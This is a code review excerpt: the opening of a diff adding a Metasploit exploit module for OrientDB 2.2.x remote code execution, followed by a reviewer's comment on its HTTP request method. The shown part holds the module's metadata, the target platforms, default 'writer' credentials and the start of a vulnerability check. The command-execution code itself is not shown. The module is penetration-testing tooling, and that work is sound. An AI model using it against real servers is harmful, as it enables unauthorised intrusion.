modules/exploits/multi/http/orientdb_exec.rb

```diff
@@ -0,0 +1,258 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OrientDB 2.2.x Remote Code Execution',
+      'Description'    => %q{
+          This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
+          All versions from 2.2.1 up to 2.2.22 should be vulnerable.
+      },
+      'Author'  =>
+        [
+          'Francis Alexander - Beyond Security\'s SecuriTeam Secure Disclosure program', # Public PoC
+          'Ricardo Jorge Borges de Almeida ricardojba1[at]gmail.com', # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://blogs.securiteam.com/index.php/archives/3318'],
+          ['URL', 'http://www.palada.net/index.php/2017/07/13/news-2112/'],
+          ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017']
+        ],
+      'Platform'  => %w{ linux unix win },
+      'Privileged'  => false,
+      'Targets'   =>
+        [
+          ['Linux',    {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+          ['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}],
+          ['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => ['vbs','certutil']}]
+        ],
+      'DisclosureDate' => 'Jul 13 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(2480),
+        OptString.new('USERNAME', [ true,  'HTTP Basic Auth User', 'writer' ]),
+        OptString.new('PASSWORD', [ true,  'HTTP Basic Auth Password', 'writer' ]),
+        OptString.new('TARGETURI', [ true,  'The path to the OrientDB application', '/' ])
+      ])
+  end
+
+  def check
+    uri = target_uri
+    uri.path = normalize_uri(uri.path)
+    uri.path << "/" if uri.path[-1, 1] != "/"
+    res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
```

Comment:
Is there a reason you're using `send_request_raw` rather than `sen_request_cgi` ? The latter is preferred.